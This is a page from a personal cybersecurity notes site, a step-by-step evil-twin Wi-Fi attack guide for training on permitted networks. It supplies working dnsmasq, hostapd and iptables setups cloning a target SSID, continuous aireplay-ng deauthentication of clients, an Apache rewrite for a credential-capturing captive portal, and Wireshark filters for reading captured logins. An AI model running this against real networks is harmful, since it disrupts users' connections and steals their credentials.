πŸ•ΈοΈ
Th4ntis CyberSec
  • πŸ•·οΈ>whoami_
  • πŸ–₯️General Info
    • CyberSec News
    • Getting Started and other Resources
      • CompTIA Certs
        • Security+
        • Pentest+
    • MITRE ATT&CK
    • Cyber Kill Chain
    • Docker
  • πŸ’»Networking
    • General Networking
    • Common Ports and Protocols
    • TCP/IP Model
    • OSI Model
    • Subnetting
    • Wireshark
    • NMap
    • Wireless
      • Wardriving/WiFi Sniffing
    • 3-Way Handshake
  • 🐧Linux
    • Common commands
    • Sudo
    • Files and File contents
    • Sed Awk and Grep
    • Permissions
  • πŸͺŸWindows
    • Event Codes
    • Powershell
    • Internals
    • Active Directory
  • πŸ”ŽOSINT
    • OSINT Tools
    • IP/Domain OSINT
    • Email/Username OSINT
    • URL OSINT and Sandboxing
    • Social Media OSINT
    • Website OSINT
    • Password OSINT
    • Physical Location OSINT
    • Image OSINT
    • People OSINT
    • Phone Number OSINT
    • Shodan
    • Google Dorking
  • πŸ› οΈTools
    • Brute Force
      • Hydra
    • Credential Dumping
      • Mimikatz
    • Enumeration
      • Bloodhound
      • Certipy
      • Dirb/Dirbuster
      • Enum4Linux
      • GoBuster
    • Exploitation Framework
      • Metasploit
      • Sliver
      • Cobalt Strike
    • Hash Cracking
      • Hashcat
      • JohnTheRipper
    • Methods
      • Powershell Obfuscation
      • Privilege Escalation
      • Pass-The-Hash
      • Kerberos and Kerberoasting
    • Vulnerability Scanners
      • Nessus
      • OpenVAS
    • Web App
      • BurpSuite
      • OWASP Zap
    • Wireless
      • Aircrack-ng
      • Kismet
      • Bettercap
      • HCXDumptool
      • Wifite
    • Impacket
    • Social-Engineer Toolkit (SET)
  • πŸ“”Guides and How-To's
    • Lab Setup
      • Ubuntu VM
      • Kali VM
      • Windows User VM
      • Windows Server VM
    • Wardriving
      • Pwnagotchi
    • Wireless Pentesting
      • WiFi Pineapple Basics
      • Evil-Twin Attack
    • Over The Wire
      • Bandit
      • Natas
      • Leviathan
      • Krypton
      • Narnia
      • Behemoth
      • Utumno
      • Maze
      • Vortex
      • Manpage
    • Docker and Kali Linux
    • Staying Private and goin Dark Online
  • πŸ“•Quick References
    • Tools
      • Tmux
      • NMap
      • Ffuf
      • NetExec
      • CrackMapExec
      • Proxychains
      • OneDriveUser Enum
      • Hashcat
      • Mimikatz
    • One-liners
    • Reverse Shells
    • Post Exploitation
    • Enumeration
      • Google
      • Sublist3r
      • NMap
      • DNSDumpster
    • Hashcracking
    • Wireless
  • πŸ““Courses
    • PNPT
      • Practical Ethical Hacking
      • Windows Privilege Escalation
      • Linux Privilege Escalation
      • OSINT Fundamentals
      • External Pentest Playbook
  • ☁️TryHackMe
    • Attacking Kerberos
    • Hacking with Powershell
    • Powershell for Pentesters
    • Linux PrivEsc
    • Windows PrivEsc
    • Blue
    • Kenobi
  • πŸ“¦HackTheBox
    • Starting Point
      • Tier 0
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Explosion
        • Preignition
        • Mongod
        • Synced
      • Tier 1
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
      • Tier 2
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Included
        • Markup
        • Base
    • Walkthroughs
      • Lame
      • Analytics
      • Manager
      • Codify
Powered by GitBook
On this page
  • Hardware
  • Finding target
  • Setup AP
  • Captive Portals
  • Post connection
Edit on GitHub
  1. Guides and How-To's
  2. Wireless Pentesting

Evil-Twin Attack

Last updated 1 year ago

This is for educational purposes and only to be performed on networks you have permission to do so.

Basic info on Wireless can be found . This will be a walk through on performing an and .

An evil twin is a fake wireless access point(AP) that looks like a real one. The concept is to set up a malicious wireless network with the same SSID name as the target.

This is not required to have a WiFi Adapter that supports monitor mode, also known as packet injection. Though this will required if kicking clients off their network to connect to ours.

Hardware

I myself have and recommend these adapters:

  • <-- Capable of 2.4GHz and 5GHz

  • <-- Capable of 2.4GHz and 5GHz

  • <-- Capable of 2.4GHz and 5GHz (This more than likely *will* require driver installation)

  • <-- Capable of 2.4GHz and 5GHz

First we install the prerequisites

sudo apt install -y dnsmasq and hostapd aircrack-ng

Finding target

First we find our target, I will target "Open-WiFi" in this example. we use airodump for this

sudo airodump-ng (interface) 

Kill process that may interfere

sudo airmon-ng check kill

now put the interface into monitor mode if we're deauthenticating a client.

sudo airmon-ng start (interface)

Setup AP

Create dnsmaqs.conf file

# Set the wifi interface
interface=(interface)

# Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

# Set the gateway IP address
dhcp-option=3,10.0.0.1

# Set DNS server address
dhcp-option=6,10.0.0.1

# Set Server
server=8.8.8.8

# logs
log-queries
log-dhcp

# Redirect all requests to 10.0.0.1
#address=/#/10.0.0.1

# Redirect google to 10.0.0.1
#address=/google.com/10.0.0.1
#address=/www.google.com/10.0.0.1
#address=/google.com/www.google.com.com/10.0.0.1

Note to uncomment lines. if we uncomment the #address=/#/10.0.0.1 this will let clients connect but they will not get internet access as the pound sign(#) is a wildcard for dnsmasq. So they will connect to the AP, then immediately asked to sign-in with the Evil Portal that is setup.

So instead we can redirect websites back to our Evil Portal instead.

Create hostapd.conf and fill in with target info

interface=(interface)
driver=nl80211
ssid=(Target AP)
hw_mode=g
channel=(Target channel)
macaddr_acl=0
ignore_broadcast_ssid=0

Assign the interface a gateway and netmask

sudo ifconfig (interface) up 10.0.0.1 netmask 255.255.255.0

Add the routing table

sudo route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

Setup an easy script for IP with:

sudo iptables --flush
sudo iptables --table nat --append POSTROUTING --out-interface (internet interface) -j MASQUERADE 
sudo iptables --append FORWARD --in-interface (wireless interface) -j ACCEPT 
sudo iptables -t nat -A POSTROUTING -j MASQUERADE
sudo echo 1 > /proc/sys/net/ipv4/ip_forward

I named mine IP-Tables.sh. Make it executable and run it

chmod +x IP-Tables.sh
sudo ./IP-Tables.sh

If you want the AP setup without using a captive portal, just run dnsmasq and hostapd

Start dnsmasq with

sudo dnsmasq -C (path/to/dnsmasq.conf)

Start hostapd with

sudo hostapd (path/to/hostapd.conf)

We can run the command with a -B at the end to push it to the background. Though if we do this, we don't see when a client connects

sudo hostapd (path/to/hostapd.conf) -B

Captive Portals

Put your captive portal files, and put them in the /var/www/html/ directory.

Edit /etc/apache2/sites-enabled/000-default.conf and add the following to the end

sudo nano /etc/apache2/sites-enabled/000-default.conf
<Directory "/var/www/html">
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ / [L,QSA]
</Directory>

Start the web server

sudo service apache2 start

Start dnsmasq with:

sudo dnsmasq -C (path/to/dnsmasq.conf)

Start hostapd AP with:

sudo hostapd (path/to/hostapd.conf)

We can run the command with a -B at the end to push it to the background. Though if we do this, we don't see when a client connects

sudo hostapd (path/to/hostapd.conf) -B

Once we're ready, we can disconnect clients from their network to connect to ours with aireplay.

sudo aireplay-ng -0 0 -a (BSSID) (interface)

OR if we want to deauth a specific client:

sudo aireplay-ng -0 0 -a (bssid) -c (Client MAC Address) (interface)

the -0 0 will send deauth packets continuously until stopped. we can change it to -0 10 to send just 10 deauth packets.

Post connection

As the user attempts to go to any page, they are taken to a login portal, asked enter a username/password on the portal and it will be captured.

We look for HTTP Post Request , then HTML Form URL Encoded, we will see their credentials.

Wireshark to filter for packets

  • dns and ip.adr=(IP) to see sites they are going to

  • frame contains (word) will search for various words

  • http.request.method=="POST" will show us login info.

You can also use a device such as . This primarily works on open networks.

Once they are connected, or even before, we can start intercepting traffic with whatever tools we want, like , , , etc. In this case I'll use wireshark on wlan0, the interface I was broadcasting from.

πŸ“”
here
Evil Twin wireless attack
Captive Portals
Alfa AWUS036ACM
Alfa AWUS036ACHM
Alfa AWUS036ACH
Panda Wireless PAU09 N600
Alfa AWUS036NEH
Alfa AWUS036NH
Panda Wireless PAU05
TP-Link TL-WN722N
Ralink USB WiFi RT5370
WiFi Pineapple
Example Portals here
Wireshark
tshark
tcpdump